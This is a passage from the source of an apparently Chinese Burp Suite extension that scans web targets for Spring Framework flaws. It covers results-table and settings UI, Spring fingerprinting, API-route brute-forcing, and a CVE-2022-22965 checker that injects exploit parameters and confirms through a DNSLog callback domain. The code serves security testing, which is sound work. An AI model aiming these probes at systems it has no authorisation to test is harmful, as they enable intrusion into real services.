SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 137 | String startTime = sdf.format(date); 138 | int id = this.tasks.size(); 139 | this.tasks.add(new ScanResultsUI.TableData(id, url, statusCode, requestMethod, extensionMethod, issue, startTime, "", requestResponse)); 140 | this.fireTableRowsInserted(id, id); 141 | return id; 142 | } 143 | } 144 | 145 | public int save(int id, String extensionMethod, String requestMethod, String url, String statusCode, String issue, IHttpRequestResponse requestResponse) { 146 | ScanResultsUI.TableData dataEntry = (ScanResultsUI.TableData)this.tasks.get(id); 147 | String startTime = dataEntry.startTime; 148 | Date d = new Date(); 149 | SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); 150 | String endTime = sdf.format(d); 151 | synchronized(this.tasks) { 152 | this.tasks.set(id, new ScanResultsUI.TableData(id, url, statusCode, requestMethod, extensionMethod, issue, startTime, endTime, requestResponse)); 153 | this.fireTableRowsUpdated(id, id); 154 | return id; 155 | } 156 | } 157 | 158 | private static class TableData { 159 | final int id; 160 | final String url; 161 | final String status_code; 162 | final String requestMethod; 163 | final String checkMethod; 164 | final String issue; 165 | final String startTime; 166 | final String endTime; 167 | final IHttpRequestResponse iHttpRequestResponse; 168 | 169 | public TableData(int id, String url, String status_code, String method, String checkMethod, String issue, String startTime, String endTime, IHttpRequestResponse iHttpRequestResponse) { 170 | this.id = id; 171 | this.url = url; 172 | this.status_code = status_code; 173 | this.requestMethod = method; 174 | this.checkMethod = checkMethod; 175 | this.issue = issue; 176 | this.startTime = startTime; 177 | this.endTime = endTime; 178 | this.iHttpRequestResponse = iHttpRequestResponse; 179 | } 180 | } 181 | 182 | private class Table extends JTable { 183 | public Table(TableModel dm) { 184 | super(dm); 185 | } 186 | 187 | public void changeSelection(int rowIndex, int columnIndex, boolean toggle, boolean extend) { 188 | ScanResultsUI.TableData data = (ScanResultsUI.TableData)ScanResultsUI.this.tasks.get(this.convertRowIndexToModel(rowIndex)); 189 | ScanResultsUI.this.messageRequest.setMessage(data.iHttpRequestResponse.getRequest(), true); 190 | ScanResultsUI.this.messageResponse.setMessage(data.iHttpRequestResponse.getResponse(), false); 191 | ScanResultsUI.this.currentHttp = data.iHttpRequestResponse; 192 | super.changeSelection(rowIndex, columnIndex, toggle, extend); 193 | } 194 | } 195 | } 196 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/UI/tabs/SettingUI.java: -------------------------------------------------------------------------------- 1 | package burp.UI.tabs; 2 | 3 | import burp.IBurpExtenderCallbacks; 4 | import java.awt.Color; 5 | import java.awt.Font; 6 | import java.util.ArrayList; 7 | import javax.swing.BoxLayout; 8 | import javax.swing.JCheckBox; 9 | import javax.swing.JComboBox; 10 | import javax.swing.JLabel; 11 | import javax.swing.JPanel; 12 | import javax.swing.JTabbedPane; 13 | import javax.swing.JTextField; 14 | import javax.swing.border.EmptyBorder; 15 | 16 | public class SettingUI { 17 | private IBurpExtenderCallbacks callbacks; 18 | private JTabbedPane tabs; 19 | private JTabbedPane reverseTabs; 20 | private JCheckBox enableCheckBox; 21 | private JCheckBox errorCheckBox; 22 | private JCheckBox reverseCheckBox; 23 | private JCheckBox checkAll; 24 | private JCheckBox checkSpring; 25 | private JLabel enableLabel; 26 | private JLabel checkLabel; 27 | private JLabel reverseLabel; 28 | private JLabel scanLabel; 29 | private JLabel vulId; 30 | private JPanel backendUI; 31 | private JTextField othersDnsLog; 32 | private JComboBox backendSelector; 33 | private JComboBox vulSelector; 34 | 35 | public SettingUI(IBurpExtenderCallbacks callbacks, JTabbedPane tabs) { 36 | this.callbacks = callbacks; 37 | this.tabs = tabs; 38 | this.initUI(); 39 | this.tabs.addTab("设置", this.backendUI); 40 | } 41 | 42 | public SettingUI() { 43 | this.initUI(); 44 | } 45 | 46 | public JPanel getBackendUI() { 47 | return this.backendUI; 48 | } 49 | 50 | public void initUI() { 51 | this.backendUI = new JPanel(); 52 | this.backendUI.setAlignmentX(0.0F); 53 | this.backendUI.setBorder(new EmptyBorder(0, 0, 0, 0)); 54 | this.backendUI.setLayout(new BoxLayout(this.backendUI, 1)); 55 | this.enableLabel = new JLabel("基础设置:"); 56 | this.scanLabel = new JLabel("扫描类型:"); 57 | this.checkLabel = new JLabel("检测方式:"); 58 | this.reverseLabel = new JLabel("回连平台:"); 59 | this.vulId = new JLabel("检测编号:"); 60 | this.enableCheckBox = new JCheckBox("启动", true); 61 | this.errorCheckBox = new JCheckBox("回显检测", true); 62 | this.reverseCheckBox = new JCheckBox("回连检测", true); 63 | this.checkAll = new JCheckBox("同一站点仅检测一次", true); 64 | this.checkSpring = new JCheckBox("过滤检测Spring框架流量", true); 65 | this.enableLabel.setForeground(new Color(255, 89, 18)); 66 | this.enableLabel.setFont(new Font("Serif", 0, this.enableLabel.getFont().getSize() + 2)); 67 | this.scanLabel.setForeground(new Color(255, 89, 18)); 68 | this.scanLabel.setFont(new Font("Serif", 0, this.scanLabel.getFont().getSize() + 2)); 69 | this.checkLabel.setForeground(new Color(255, 89, 18)); 70 | this.checkLabel.setFont(new Font("Serif", 0, this.checkLabel.getFont().getSize() + 2)); 71 | this.reverseLabel.setForeground(new Color(255, 89, 18)); 72 | this.reverseLabel.setFont(new Font("Serif", 0, this.reverseLabel.getFont().getSize() + 2)); 73 | this.vulId.setForeground(new Color(255, 89, 18)); 74 | this.vulId.setFont(new Font("Serif", 0, this.vulId.getFont().getSize() + 2)); 75 | this.vulSelector = new JComboBox(this.getvulIDSelectors()); 76 | this.vulSelector.setSelectedIndex(0); 77 | this.vulSelector.setMaximumSize(this.vulSelector.getPreferredSize()); 78 | this.backendSelector = new JComboBox(this.getbackendSelectors()); 79 | this.backendSelector.setSelectedIndex(0); 80 | this.backendSelector.setMaximumSize(this.backendSelector.getPreferredSize()); 81 | this.reverseTabs = new JTabbedPane(); 82 | this.reverseTabs.addTab("DNSLog Platform", this.getCeyePanel()); 83 | JPanel runPanel = this.GetXPanel(); 84 | runPanel.add(this.enableLabel); 85 | runPanel.add(this.enableCheckBox); 86 | JPanel scanPanel = this.GetXPanel(); 87 | scanPanel.add(this.scanLabel); 88 | scanPanel.add(this.checkAll); 89 | scanPanel.add(this.checkSpring); 90 | JPanel checkPanel = this.GetXPanel(); 91 | checkPanel.add(this.checkLabel); 92 | checkPanel.add(this.errorCheckBox); 93 | checkPanel.add(this.reverseCheckBox); 94 | JPanel reversePanel = this.GetXPanel(); 95 | reversePanel.add(this.reverseLabel); 96 | reversePanel.add(this.backendSelector); 97 | JPanel vulIdPanel = this.GetXPanel(); 98 | vulIdPanel.add(this.vulId); 99 | vulIdPanel.add(this.vulSelector); 100 | JPanel settingPanel = this.GetYPanel(); 101 | settingPanel.add(runPanel); 102 | settingPanel.add(checkPanel); 103 | settingPanel.add(scanPanel); 104 | settingPanel.add(vulIdPanel); 105 | JPanel reverseInfoPanel = this.GetXPanel(); 106 | reverseInfoPanel.add(reversePanel); 107 | reverseInfoPanel.add(this.reverseTabs); 108 | this.backendUI.add(settingPanel); 109 | this.backendUI.add(reverseInfoPanel); 110 | } 111 | 112 | private JPanel getCeyePanel() { 113 | JPanel jPanel = new JPanel(); 114 | jPanel.add(new JLabel("可指定请求dns(不支持检测):")); 115 | this.othersDnsLog = new JTextField("DnsLog.cn", 30); 116 | jPanel.add(this.othersDnsLog); 117 | return jPanel; 118 | } 119 | 120 | public JPanel GetXPanel() { 121 | JPanel panel = new JPanel(); 122 | panel.setAlignmentX(0.0F); 123 | panel.setBorder(new EmptyBorder(5, 0, 5, 0)); 124 | return panel; 125 | } 126 | 127 | public JPanel GetYPanel() { 128 | JPanel panel = new JPanel(); 129 | panel.setAlignmentX(0.0F); 130 | panel.setBorder(new EmptyBorder(5, 0, 5, 0)); 131 | panel.setLayout(new BoxLayout(panel, 1)); 132 | return panel; 133 | } 134 | 135 | private String[] getbackendSelectors() { 136 | ArrayList selectors = new ArrayList(); 137 | SettingUI.Backends[] var2 = SettingUI.Backends.values(); 138 | int var3 = var2.length; 139 | 140 | for(int var4 = 0; var4 < var3; ++var4) { 141 | SettingUI.Backends backend = var2[var4]; 142 | selectors.add(backend.name().trim()); 143 | } 144 | 145 | return (String[])selectors.toArray(new String[selectors.size()]); 146 | } 147 | 148 | private String[] getvulIDSelectors() { 149 | ArrayList selectors = new ArrayList(); 150 | selectors.add("ALL"); 151 | selectors.add("爆破路由,API"); 152 | selectors.add("CVE-2016-4977 Spring Security OAuth2 远程命令执行漏洞"); 153 | selectors.add("CVE-2017-4971 Spring Web Flow 远程代码执行漏洞(待完善)"); 154 | selectors.add("CVE-2018-1270 Spring Messaging 远程命令执行漏洞(待完善)"); 155 | selectors.add("CVE-2018-1273 Spring Data Commons 远程命令执行漏洞(待完善)"); 156 | selectors.add("CVE-2022-22947 Spring Cloud Gateway Actuator API SpEL表达式注入命令执行"); 157 | selectors.add("CVE-2022-22963 Spring Cloud Function SpEL表达式命令注入"); 158 | selectors.add("CVE-2022-22965 Spring Cloud Framework 远程代码执行漏洞"); 159 | return (String[])selectors.toArray(new String[selectors.size()]); 160 | } 161 | 162 | public boolean isEnable() { 163 | return this.enableCheckBox.isSelected(); 164 | } 165 | 166 | public boolean isCheckSpring() { 167 | return this.checkSpring.isSelected(); 168 | } 169 | 170 | public boolean isCheckAll() { 171 | return this.checkAll.isSelected(); 172 | } 173 | 174 | public boolean isErrorCheck() { 175 | return this.errorCheckBox.isSelected(); 176 | } 177 | 178 | public boolean isReverseCheck() { 179 | return this.reverseCheckBox.isSelected(); 180 | } 181 | 182 | public String getVulId() { 183 | return this.vulSelector.getSelectedItem().toString(); 184 | } 185 | 186 | public SettingUI.Backends getBackendPlatform() { 187 | return SettingUI.Backends.valueOf(this.backendSelector.getSelectedItem().toString()); 188 | } 189 | 190 | public String getOtherDnsLog() { 191 | return this.othersDnsLog.getText().trim().toLowerCase(); 192 | } 193 | 194 | public static enum Backends { 195 | BurpCollaborator, 196 | DnsLogCn, 197 | Others; 198 | } 199 | } 200 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/auxiliary/CheckIsSpring.java: -------------------------------------------------------------------------------- 1 | package burp.auxiliary; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IHttpService; 7 | import burp.IRequestInfo; 8 | import java.net.MalformedURLException; 9 | import java.net.URL; 10 | import java.util.Iterator; 11 | import java.util.List; 12 | import java.util.Random; 13 | 14 | public class CheckIsSpring { 15 | private BurpExtender burpExtender; 16 | private IExtensionHelpers helpers; 17 | public static Random random = new Random(); 18 | 19 | public CheckIsSpring(BurpExtender burpExtender, IExtensionHelpers helpers) { 20 | this.burpExtender = burpExtender; 21 | this.helpers = helpers; 22 | } 23 | 24 | public boolean isSpring(IHttpRequestResponse httpRequestResponse, String flag, boolean isVersion2x) { 25 | try { 26 | IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse); 27 | IHttpService service = httpRequestResponse.getHttpService(); 28 | String url = requestInfo.getUrl().toString() + flag; 29 | if (isVersion2x) { 30 | url = this.getUri(url) + "actuator/" + flag + this.randomStr(5); 31 | } 32 | 33 | byte[] newRequest = this.helpers.buildHttpRequest(new URL(service.getProtocol(), service.getHost(), service.getPort(), url)); 34 | requestInfo = this.helpers.analyzeRequest(service, newRequest); 35 | List headers = requestInfo.getHeaders(); 36 | Iterator var9 = headers.iterator(); 37 | 38 | while(var9.hasNext()) { 39 | String header = (String)var9.next(); 40 | if (header.startsWith("Accept")) { 41 | headers.remove(header); 42 | headers.add("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8"); 43 | break; 44 | } 45 | } 46 | 47 | IRequestInfo requestInfo1 = this.helpers.analyzeRequest(service, newRequest); 48 | newRequest = (new String(newRequest)).substring(requestInfo1.getBodyOffset()).getBytes(); 49 | newRequest = this.helpers.buildHttpMessage(headers, newRequest); 50 | IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(httpRequestResponse.getHttpService(), newRequest); 51 | String body = (new String(requestResponse.getResponse())).substring(this.helpers.analyzeResponse(requestResponse.getResponse()).getBodyOffset()).toLowerCase(); 52 | if (body.contains("whitelabel error page") || body.contains("unauthorized")) { 53 | this.burpExtender.stdout.println("[*] 存在Spring框架: " + url); 54 | return true; 55 | } 56 | } catch (MalformedURLException var12) { 57 | var12.printStackTrace(); 58 | this.burpExtender.stderr.println(var12.getMessage()); 59 | } 60 | 61 | return false; 62 | } 63 | 64 | public String getUri(String url) { 65 | url = url.replace("https://", "").replace("http://", ""); 66 | String pureUrl = url.substring(0, url.contains("?") ? url.indexOf("?") : url.length()); 67 | pureUrl = pureUrl.substring(pureUrl.contains("/") ? pureUrl.indexOf("/") : pureUrl.length(), pureUrl.contains("/") ? pureUrl.lastIndexOf("/") : pureUrl.length()); 68 | return pureUrl + "/"; 69 | } 70 | 71 | public String randomStr(int n) { 72 | StringBuilder s = new StringBuilder(); 73 | char[] stringArray = new char[]{'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9'}; 74 | 75 | for(int i = 0; i < n; ++i) { 76 | char num = stringArray[random.nextInt(stringArray.length)]; 77 | s.append(num); 78 | } 79 | 80 | return s.toString(); 81 | } 82 | } 83 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/auxiliary/ReadFile.java: -------------------------------------------------------------------------------- 1 | package burp.auxiliary; 2 | 3 | import java.io.BufferedReader; 4 | import java.io.File; 5 | import java.io.FileInputStream; 6 | import java.io.IOException; 7 | import java.io.InputStreamReader; 8 | import java.nio.charset.StandardCharsets; 9 | import java.nio.file.Files; 10 | import java.nio.file.Path; 11 | import java.nio.file.Paths; 12 | import java.util.HashSet; 13 | import java.util.List; 14 | import java.util.Set; 15 | 16 | public class ReadFile { 17 | private final String filePath; 18 | 19 | public ReadFile(String filePath) { 20 | this.filePath = filePath; 21 | } 22 | 23 | public List littleFile() throws IOException { 24 | Path path = Paths.get(this.filePath); 25 | byte[] bytes = Files.readAllBytes(path); 26 | return Files.readAllLines(path, StandardCharsets.UTF_8); 27 | } 28 | 29 | public Set bigFile() throws IOException { 30 | File file = new File(this.filePath); 31 | FileInputStream fis = new FileInputStream(file); 32 | InputStreamReader isr = new InputStreamReader(fis); 33 | BufferedReader br = new BufferedReader(isr); 34 | HashSet content = new HashSet(); 35 | 36 | String line; 37 | while((line = br.readLine()) != null) { 38 | content.add(line); 39 | } 40 | 41 | br.close(); 42 | return content; 43 | } 44 | } 45 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/auxiliary/YamlReader.java: -------------------------------------------------------------------------------- 1 | package burp.auxiliary; 2 | 3 | import burp.BurpExtender; 4 | import java.io.File; 5 | import java.io.FileInputStream; 6 | import java.io.FileNotFoundException; 7 | import java.io.InputStream; 8 | import java.util.HashMap; 9 | import java.util.Map; 10 | import org.yaml.snakeyaml.Yaml; 11 | 12 | public class YamlReader { 13 | private BurpExtender burpExtender; 14 | private static Map> properties = new HashMap(); 15 | 16 | public YamlReader(BurpExtender burpExtender) throws FileNotFoundException { 17 | this.burpExtender = burpExtender; 18 | String p = this.getRunFilePath() + "config\\config.yml"; 19 | File f = new File(p); 20 | properties = (Map)(new Yaml()).load((InputStream)(new FileInputStream(f))); 21 | this.burpExtender.stdout.println(p + " 配置文件加载完毕!"); 22 | } 23 | 24 | public YamlReader() throws FileNotFoundException { 25 | String p = "E:\\Tools\\burp\\extend开发\\SpingVulScan\\target\\config\\config.yml"; 26 | File f = new File(p); 27 | properties = (Map)(new Yaml()).load((InputStream)(new FileInputStream(f))); 28 | } 29 | 30 | public Object getValueByKey(String key) { 31 | String separator = "."; 32 | String[] separatorKeys = null; 33 | if (!key.contains(separator)) { 34 | return properties.get(key); 35 | } else { 36 | separatorKeys = key.split("\\."); 37 | Object finalValue = new HashMap(); 38 | 39 | for(int i = 0; i < separatorKeys.length - 1; ++i) { 40 | if (i == 0) { 41 | finalValue = (Map)properties.get(separatorKeys[i]); 42 | } else { 43 | if (finalValue == null) { 44 | break; 45 | } 46 | 47 | finalValue = (Map)((Map)finalValue).get(separatorKeys[i]); 48 | } 49 | } 50 | 51 | return finalValue == null ? null : ((Map)finalValue).get(separatorKeys[separatorKeys.length - 1]); 52 | } 53 | } 54 | 55 | private String getRunFilePath() { 56 | String path = ""; 57 | int lastIndex = this.burpExtender.callbacks.getExtensionFilename().lastIndexOf(File.separator); 58 | path = this.burpExtender.callbacks.getExtensionFilename().substring(0, lastIndex) + File.separator; 59 | return path; 60 | } 61 | } 62 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/Payload.java: -------------------------------------------------------------------------------- 1 | package burp.payload; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IScanIssue; 7 | import burp.DnsLog.DnsLogInterface; 8 | import burp.auxiliary.CheckIsSpring; 9 | 10 | public interface Payload { 11 | BurpExtender burpExtender = null; 12 | IExtensionHelpers helpers = null; 13 | CheckIsSpring checkIsSpring = null; 14 | IHttpRequestResponse updataHttp = null; 15 | 16 | IScanIssue doCheckVul(IHttpRequestResponse var1, DnsLogInterface var2); 17 | 18 | IHttpRequestResponse export(); 19 | } 20 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/APIunauthorized.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IHttpService; 7 | import burp.IRequestInfo; 8 | import burp.IResponseInfo; 9 | import burp.IScanIssue; 10 | import burp.SpringIssue; 11 | import burp.DnsLog.DnsLogInterface; 12 | import burp.auxiliary.CheckIsSpring; 13 | import burp.auxiliary.ReadFile; 14 | import burp.auxiliary.YamlReader; 15 | import burp.payload.Payload; 16 | import java.io.File; 17 | import java.io.FileNotFoundException; 18 | import java.io.IOException; 19 | import java.net.URL; 20 | import java.util.Iterator; 21 | import java.util.List; 22 | import java.util.Set; 23 | 24 | public class APIunauthorized implements Payload { 25 | private BurpExtender burpExtender; 26 | private IExtensionHelpers helpers; 27 | private CheckIsSpring checkIsSpring; 28 | private YamlReader yamlReader; 29 | private IHttpRequestResponse updataHttp; 30 | 31 | public APIunauthorized(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException { 32 | this.burpExtender = burpExtender; 33 | this.helpers = helpers; 34 | this.burpExtender.stdout.println("===========================正在测试是否存在:API未授权,泄露==========================="); 35 | this.helpers = helpers; 36 | this.checkIsSpring = checkIsSpring; 37 | this.yamlReader = new YamlReader(this.burpExtender); 38 | } 39 | 40 | public IScanIssue doCheckVul(IHttpRequestResponse httpRequestResponse, DnsLogInterface dnsLogPlatform) { 41 | int lastIndex = this.burpExtender.callbacks.getExtensionFilename().lastIndexOf(File.separator); 42 | String path = this.burpExtender.callbacks.getExtensionFilename().substring(0, lastIndex) + File.separator; 43 | ReadFile readFile = new ReadFile(path + "\\config\\apiRoute.txt"); 44 | 45 | try { 46 | Set routes = readFile.bigFile(); 47 | return this.routeBoom(httpRequestResponse, routes, ""); 48 | } catch (IOException var7) { 49 | var7.printStackTrace(); 50 | return null; 51 | } 52 | } 53 | 54 | public IScanIssue routeBoom(IHttpRequestResponse httpRequestResponse, Set routes, String flag) { 55 | IRequestInfo requestInfo = this.helpers.analyzeRequest(httpRequestResponse); 56 | List headers = requestInfo.getHeaders(); 57 | Iterator var6 = routes.iterator(); 58 | 59 | IHttpRequestResponse requestResponse; 60 | IResponseInfo responseInfo; 61 | URL url; 62 | do { 63 | if (!var6.hasNext()) { 64 | this.burpExtender.stdout.println("===========================爆破完毕!不存在:API 未授权 ===========================\n"); 65 | return null; 66 | } 67 | 68 | String route = (String)var6.next(); 69 | if (((String)headers.get(0)).contains("HTTP/1.1")) { 70 | headers.set(0, "GET " + flag + route + " HTTP/1.1"); 71 | } else { 72 | headers.set(0, "GET " + flag + route + " HTTP/2"); 73 | } 74 | 75 | IHttpService service = httpRequestResponse.getHttpService(); 76 | byte[] newRequest = this.helpers.buildHttpMessage(headers, (byte[])null); 77 | requestResponse = this.burpExtender.callbacks.makeHttpRequest(service, newRequest); 78 | responseInfo = this.helpers.analyzeResponse(requestResponse.getResponse()); 79 | url = this.helpers.analyzeRequest(requestResponse).getUrl(); 80 | } while(responseInfo.getStatusCode() != 200 && responseInfo.getStatusCode() != 302 && responseInfo.getStatusCode() != 500 && responseInfo.getStatusCode() != 401); 81 | 82 | if (!responseInfo.getInferredMimeType().equals("")) { 83 | this.burpExtender.stdout.println("===========================检测完毕!存在:API 未授权 ===========================\n"); 84 | this.updataHttp = requestResponse; 85 | return new SpringIssue(url, "APIunauthorized", 0, "Medium", "Tentative", (String)null, (String)null, "API exists, API leakage is probable, please check manually", (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService()); 86 | } else { 87 | this.burpExtender.stdout.println("===========================检测完毕!可能存在:API 未授权 ===========================\n"); 88 | this.updataHttp = requestResponse; 89 | return new SpringIssue(url, "API unauthorized", 0, "Low", "Tentative", (String)null, (String)null, "It is detected that the API burst is echoed, and there may be a route, which needs to be verified by manual test", (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService()); 90 | } 91 | } 92 | 93 | public IHttpRequestResponse export() { 94 | return this.updataHttp; 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /SpingVulScan-1.0/src/main/java/burp/payload/RCE/CloudFramework.java: -------------------------------------------------------------------------------- 1 | package burp.payload.RCE; 2 | 3 | import burp.BurpExtender; 4 | import burp.IExtensionHelpers; 5 | import burp.IHttpRequestResponse; 6 | import burp.IParameter; 7 | import burp.IRequestInfo; 8 | import burp.IResponseInfo; 9 | import burp.IScanIssue; 10 | import burp.SpringIssue; 11 | import burp.DnsLog.DnsLogInterface; 12 | import burp.auxiliary.CheckIsSpring; 13 | import burp.auxiliary.YamlReader; 14 | import burp.payload.Payload; 15 | import java.io.FileNotFoundException; 16 | import java.util.List; 17 | 18 | public class CloudFramework implements Payload { 19 | private BurpExtender burpExtender; 20 | private IExtensionHelpers helpers; 21 | private CheckIsSpring checkIsSpring; 22 | private YamlReader yamlReader; 23 | private DnsLogInterface dnsLogPlatform; 24 | private IHttpRequestResponse updataHttp; 25 | 26 | public CloudFramework(BurpExtender burpExtender, IExtensionHelpers helpers, CheckIsSpring checkIsSpring) throws FileNotFoundException { 27 | this.burpExtender = burpExtender; 28 | this.helpers = helpers; 29 | this.checkIsSpring = checkIsSpring; 30 | this.burpExtender.stdout.println("===========================正在测试是否存在:Spring Cloud Framework 远程代码执行漏洞(CVE-2022-22965)==========================="); 31 | this.yamlReader = new YamlReader(this.burpExtender); 32 | } 33 | 34 | public IScanIssue doCheckVul(IHttpRequestResponse iHttpRequestResponse, DnsLogInterface dnsLogPlatform) { 35 | this.dnsLogPlatform = dnsLogPlatform; 36 | boolean isReverse = this.burpExtender.tags.getSettingUi().isReverseCheck(); 37 | boolean isError = this.burpExtender.tags.getSettingUi().isErrorCheck(); 38 | List payloads = (List)this.yamlReader.getValueByKey("CloudFramework.payloads"); 39 | String payload1 = payloads.get(0).toString(); 40 | String payload2 = payloads.get(1).toString(); 41 | IScanIssue iScanIssue = null; 42 | if (isError) { 43 | iScanIssue = this.errorCheck(iHttpRequestResponse, payload1, false, ""); 44 | if (iScanIssue == null) { 45 | iScanIssue = this.errorCheck(iHttpRequestResponse, payload1, true, ""); 46 | } 47 | } 48 | 49 | if (isReverse) { 50 | IScanIssue scanIssue = null; 51 | 52 | try { 53 | scanIssue = this.reverseCheck(iHttpRequestResponse, payload2, false, ""); 54 | if (scanIssue == null) { 55 | scanIssue = this.reverseCheck(iHttpRequestResponse, payload2, true, ""); 56 | } 57 | } catch (InterruptedException var11) { 58 | var11.printStackTrace(); 59 | } 60 | 61 | if (scanIssue != null) { 62 | return scanIssue; 63 | } 64 | } 65 | 66 | return iScanIssue; 67 | } 68 | 69 | private IScanIssue errorCheck(IHttpRequestResponse iHttpRequestResponse, String payload, boolean reqMethod, String flag) { 70 | IRequestInfo requestInfo = this.helpers.analyzeRequest(iHttpRequestResponse); 71 | List headers = requestInfo.getHeaders(); 72 | if (((String)headers.get(0)).contains("HTTP/1.1")) { 73 | headers.set(0, "GET /" + flag + " HTTP/1.1"); 74 | } else { 75 | headers.set(0, "GET /" + flag + " HTTP/2"); 76 | } 77 | 78 | byte[] newHeaderRequest = this.helpers.buildHttpMessage(headers, (byte[])null); 79 | String method = requestInfo.getMethod(); 80 | String key = payload.split("=")[0]; 81 | String value1 = String.format(payload.split("=")[1], this.checkIsSpring.randomStr(3)); 82 | String value2 = String.format(payload.split("=")[1], "false"); 83 | IParameter newParam = this.helpers.buildParameter(key, value1, (byte)("GET".equalsIgnoreCase(method) ? 0 : 1)); 84 | byte[] newParamReq = this.helpers.addParameter(newHeaderRequest, newParam); 85 | if (reqMethod) { 86 | newParamReq = this.helpers.toggleRequestMethod(newParamReq); 87 | } 88 | 89 | IHttpRequestResponse requestResponse1 = this.burpExtender.callbacks.makeHttpRequest(iHttpRequestResponse.getHttpService(), newParamReq); 90 | IResponseInfo response1 = this.helpers.analyzeResponse(requestResponse1.getResponse()); 91 | IResponseInfo request = this.helpers.analyzeResponse(requestResponse1.getRequest()); 92 | this.burpExtender.stdout.println("[*] 正在检测:" + (String)request.getHeaders().get(0) + "\n状态码:" + response1.getStatusCode()); 93 | if (response1.getStatusCode() == 400 || response1.getStatusCode() == 500 || response1.getStatusCode() == 502 || response1.getStatusCode() == 503) { 94 | newParam = this.helpers.buildParameter(key, value2, (byte)("GET".equalsIgnoreCase(method) ? 0 : 1)); 95 | newParamReq = this.helpers.addParameter(newHeaderRequest, newParam); 96 | IHttpRequestResponse requestResponse2 = this.burpExtender.callbacks.makeHttpRequest(iHttpRequestResponse.getHttpService(), newParamReq); 97 | IResponseInfo response2 = this.helpers.analyzeResponse(requestResponse2.getResponse()); 98 | this.burpExtender.stdout.println("[*] 正在检测:" + (String)response2.getHeaders().get(0) + "\n状态码:" + response1.getStatusCode()); 99 | if (response2.getStatusCode() != 400 && response2.getStatusCode() != 500 && response2.getStatusCode() != 502 && response2.getStatusCode() != 503) { 100 | this.burpExtender.stdout.println("[*] 大概率存在漏洞......"); 101 | this.updataHttp = requestResponse2; 102 | return new SpringIssue(requestInfo.getUrl(), "Spring Cloud Framework RCE (CVE-2022-22965)", 0, "Medium", "UnCertain", (String)null, (String)null, newParam.getName() + "=" + newParam.getValue(), (String)null, new IHttpRequestResponse[]{requestResponse2}, requestResponse2.getHttpService()); 103 | } 104 | } 105 | 106 | return null; 107 | } 108 | 109 | private IScanIssue reverseCheck(IHttpRequestResponse iHttpRequestResponse, String payload, boolean reqMethod, String flag) throws InterruptedException { 110 | IRequestInfo requestInfo = this.helpers.analyzeRequest(iHttpRequestResponse); 111 | String method = requestInfo.getMethod(); 112 | List headers = requestInfo.getHeaders(); 113 | if (((String)headers.get(0)).contains("HTTP/1.1")) { 114 | headers.set(0, "GET /" + flag + " HTTP/1.1"); 115 | } else { 116 | headers.set(0, "GET /" + flag + " HTTP/2"); 117 | } 118 | 119 | byte[] newHeaderRequest = this.helpers.buildHttpMessage(headers, (byte[])null); 120 | String dnsName = this.dnsLogPlatform.getTempDomain(); 121 | String[] payload1 = payload.split("&"); 122 | String key1 = payload1[0].split("=")[0]; 123 | String value1 = String.format(payload1[0].split("=")[1], "http://" + this.checkIsSpring.randomStr(3) + dnsName); 124 | String key2 = String.format(payload1[1].split("=")[0], this.checkIsSpring.randomStr(3)); 125 | String value2 = String.format(payload1[1].split("=")[1], this.checkIsSpring.randomStr(3)); 126 | this.burpExtender.stdout.println("[*] 正在检测payload:" + payload + "\n临时域名:" + dnsName); 127 | IParameter param1 = this.helpers.buildParameter(key1, value1, (byte)("GET".equalsIgnoreCase(method) ? 0 : 1)); 128 | IParameter param2 = this.helpers.buildParameter(key2, value2, (byte)("GET".equalsIgnoreCase(method) ? 0 : 1)); 129 | byte[] newParamsReq = this.helpers.addParameter(newHeaderRequest, param1); 130 | newParamsReq = this.helpers.addParameter(newParamsReq, param2); 131 | if (reqMethod) { 132 | newParamsReq = this.helpers.toggleRequestMethod(newParamsReq); 133 | } 134 | 135 | IHttpRequestResponse requestResponse = this.burpExtender.callbacks.makeHttpRequest(iHttpRequestResponse.getHttpService(), newParamsReq); 136 | if (requestResponse.getResponse() != null) { 137 | IRequestInfo requestInfo1 = this.helpers.analyzeRequest(requestResponse); 138 | this.burpExtender.stdout.println("[*] 正在校验: " + requestInfo1.getUrl() + " ..."); 139 | 140 | for(int i = 0; i < 3; ++i) { 141 | if (this.dnsLogPlatform.checkResult()) { 142 | this.burpExtender.stdout.println("===========================检测完毕!存在:Spring Cloud Framework 远程代码执行漏洞(CVE-2022-22965)==========================="); 143 | this.updataHttp = requestResponse; 144 | return new SpringIssue(requestInfo.getUrl(), "Spring Cloud Framework RCE (CVE-2022-22965)", 0, "High", "Certain", (String)null, (String)null, key1 + "=" + value1 + "&" + key2 + "=" + value2, (String)null, new IHttpRequestResponse[]{requestResponse}, requestResponse.getHttpService()); 145 | } 146 | 147 | try { 148 | Thread.sleep(10000L); 149 | } catch (InterruptedException var22) { 150 | this.burpExtender.stderr.println(var22.getMessage()); 151 | } 152 | } 153 | } 154 | 155 | 